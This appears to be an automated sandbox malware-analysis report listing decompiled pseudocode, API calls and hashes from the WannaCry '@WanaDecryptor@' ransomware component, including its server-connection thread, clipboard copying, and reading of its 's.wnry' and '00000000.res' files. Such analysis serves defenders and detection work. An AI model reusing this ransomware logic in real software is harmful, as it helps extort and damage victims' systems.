                                  							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  						_a9168 = 0xffffffff;
                                  						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                  						L24:
                                  						 *[fs:0x0] = _a9148;
                                  						return _t76;
                                  					}
                                  				}
                                  				_t92 = _a9272;
                                  				if(_t92 != 0) {
                                  					SendMessageA(_t92, 0x4e20, _t141, 0);
                                  				}
                                  				_a9224 = _t141;
                                  				goto L23;
                                  			}
































                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00401140() {
                                  				intOrPtr _v4;
                                  				void* _t17;
                                  				struct HWND__* _t18;
                                  				void* _t23;
                                  				intOrPtr _t24;
                                  
                                  				_t23 = _t17;
                                  				L00412CB0();
                                  				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                  				_t18 =  *(_t23 + 0x80);
                                  				SendMessageA(_t18, 0x401, 0, 0x280000);
                                  				_push(_t18);
                                  				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                  				_v4 = _t24;
                                  				L00412CAA();
                                  				E00401970("Connecting to server...");
                                  				 *(_t23 + 0xa8) = 0;
                                  				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
                                  				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                  					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
                                  				}
                                  				return 1;
                                  			}








                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
                                  				int _t9;
                                  				void* _t15;
                                  				void* _t22;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				void* _t39;
                                  				void* _t40;
                                  
                                  				_t39 = __ecx;
                                  				_t9 = OpenClipboard( *(__ecx + 0x20));
                                  				if(_t9 == 0) {
                                  					return _t9;
                                  				} else {
                                  					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                  					if(_t22 != 0) {
                                  						EmptyClipboard();
                                  						_t40 =  *(_t39 + 0x508);
                                  						_t15 = GlobalLock(_t22);
                                  						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                  						_t26 = _t25 >> 2;
                                  						memcpy(_t15, _t40, _t26 << 2);
                                  						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                  						GlobalUnlock(_t22);
                                  						SetClipboardData(1, _t22);
                                  						return CloseClipboard();
                                  					}
                                  					return CloseClipboard();
                                  				}
                                  			}










                                  APIs
                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
                                  				struct _IO_FILE* _t24;
                                  				void* _t30;
                                  				void* _t37;
                                  				void* _t38;
                                  				signed int _t45;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				unsigned int _t53;
                                  				signed int _t54;
                                  				void* _t66;
                                  				struct _IO_FILE* _t76;
                                  				void* _t77;
                                  				void* _t78;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t84;
                                  				void* _t85;
                                  
                                  				_t79 = __ecx;
                                  				 *((char*)(_t81 + 0xc)) = 0;
                                  				memset(_t81 + 0xd, 0, 0xc << 2);
                                  				_t82 = _t81 + 0xc;
                                  				asm("stosb");
                                  				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                  				memset(_t82 + 0x44, 0, 0x21 << 2);
                                  				_t24 = fopen("00000000.res", "rb");
                                  				_t76 = _t24;
                                  				_t84 = _t82 + 0x14;
                                  				_t89 = _t76;
                                  				if(_t76 != 0) {
                                  					fread(_t84 + 0x48, 0x88, 1, _t76);
                                  					fclose(_t76);
                                  					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                  					_t45 = _t84 + 0x60;
                                  					_push(_t84 + 0x2c);
                                  					_t66 = _t79 + 0x5f0;
                                  					_push("+++");
                                  					_push(_t45);
                                  					_push(_t66);
                                  					_t30 = E0040C4F0(_t38, _t45, _t89);
                                  					_t85 = _t84 + 0x30;
                                  					_t77 = _t30;
                                  					E0040C670();
                                  					_t90 = _t77 - 0xffffffff;
                                  					if(_t77 == 0xffffffff) {
                                  						_push(_t85 + 0xc);
                                  						_push("+++");
                                  						_push(_t85 + 0x40);
                                  						_push(_t66);
                                  						_t37 = E0040C4F0(_t38, _t45, _t90);
                                  						_t85 = _t85 + 0x10;
                                  						_t77 = _t37;
                                  					}
                                  					_t24 = E0040C670();
                                  					if(_t77 == 1) {
                                  						_t24 = 0;
                                  						asm("repne scasb");
                                  						_t48 =  !(_t45 | 0xffffffff) - 1;
                                  						if(_t48 >= 0x1e) {
                                  							asm("repne scasb");
                                  							_t51 =  !(_t48 | 0xffffffff) - 1;
                                  							if(_t51 < 0x32) {
                                  								asm("repne scasb");
                                  								_t53 =  !(_t51 | 0xffffffff);
                                  								_t78 = _t85 + 0xc - _t53;
                                  								_t54 = _t53 >> 2;
                                  								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                  								return E00401A10(_t79 + 0x50c, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t24;
                                  			}





















                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                  • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
                                  				long _t11;
                                  				void* _t26;
                                  
                                  				_t11 = _a4;
                                  				_t26 = __ecx;
                                  				if(_t11 != 0x3e9) {
                                  					L8:
                                  					L00412CBC();
                                  					return _t11;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                  					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                  					KillTimer( *(_t26 + 0x20), 0x3e9);
                                  					L00412B66();
                                  				}
                                  				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                  					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
                                  				}
                                  				_t11 =  *(_t26 + 0xa0);
                                  				if(_t11 == 0) {
                                  					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                  					if(_t11 == 0xf) {
                                  						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                  					}
                                  				}
                                  				goto L8;
                                  			}





                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
                                  				int _t6;
                                  				long _t7;
                                  				void* _t9;
                                  				void* _t14;
                                  
                                  				_t14 = __ecx;
                                  				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                  				_push(0);
                                  				if(_t6 != 0xffffffff) {
                                  					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                  					if(_t7 != 0) {
                                  						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                  						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                  						 *(_t14 + 0xf4) = _t9;
                                  						return _t9;
                                  					}
                                  					return _t7;
                                  				} else {
                                  					_push(0);
                                  					_push("Please select a host to decrypt.");
                                  					L00412CC8();
                                  					return _t6;
                                  				}
                                  			}







                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                  • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
                                  				struct tagLOGFONTA _v72;
                                  				long _t10;
                                  				struct HFONT__* _t13;
                                  				struct HWND__* _t15;
                                  				void* _t21;
                                  
                                  				_t10 = _a4;
                                  				_t21 = __ecx;
                                  				if(_t10 != 0) {
                                  					L2:
                                  					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                  					_v72.lfUnderline = 1;
                                  					_t13 = CreateFontIndirectA( &_v72);
                                  					_push(_t13);
                                  					L00412D5E();
                                  					 *((char*)(_t21 + 0x58)) = 1;
                                  					return _t13;
                                  				}
                                  				_t15 = GetParent( *(__ecx + 0x20));
                                  				_push(_t15);
                                  				L00412DAC();
                                  				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                  				_push(_t10);
                                  				L00412DE2();
                                  				if(_t10 != 0) {
                                  					goto L2;
                                  				}
                                  				return _t10;
                                  			}









                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                  • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E0040C060(void* __ecx, void* __eflags) {
                                  				void* _t35;
                                  				int _t45;
                                  				struct HWND__* _t56;
                                  				signed int _t58;
                                  				int _t59;
                                  				struct HWND__* _t87;
                                  				intOrPtr _t92;
                                  				void* _t93;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142BB);
                                  				 *[fs:0x0] = _t92;
                                  				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                  				_push(_t58);
                                  				E0040DBB0(_t92 + 0x18, 0x1000);
                                  				 *(_t92 + 0x241c) = 0;
                                  				_push(_t92 + 0x14);
                                  				_t59 = _t58 | 0xffffffff;
                                  				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                  				_t93 = _t92 + 0x10;
                                  				if(_t35 == 0) {
                                  					_t87 =  *(_t93 + 0x2430);
                                  					if(_t87 != 0) {
                                  						SendMessageA(_t87, 0x4e20, 0, 0);
                                  					}
                                  					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                  					_push(0);
                                  					_push(E0040DD40(_t93 + 0x1c));
                                  					_push(E0040DD30(_t93 + 0x20));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0, 0);
                                  						}
                                  						_push(_t93 + 0x10);
                                  						_push(_t93 + 0x102c);
                                  						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                  						_push(_t93 + 0x17);
                                  						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
                                  							if( *((char*)(_t93 + 0xf)) == 7) {
                                  								_t59 = 0;
                                  							}
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, _t59, 0);
                                  							}
                                  							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
                                  							goto L21;
                                  						} else {
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
                                  							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  						}
                                  					} else {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  						 *(_t93 + 0x241c) = 0xffffffff;
                                  						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  					}
                                  				} else {
                                  					_t56 =  *(_t93 + 0x2430);
                                  					if(_t56 != 0) {
                                  						SendMessageA(_t56, 0x4e20, _t59, 0);
                                  					}
                                  					 *(_t93 + 0x241c) = _t59;
                                  					L21:
                                  					E0040DBF0(_t93 + 0x14);
                                  					_t45 = _t59;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                  				return _t45;
                                  			}












                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
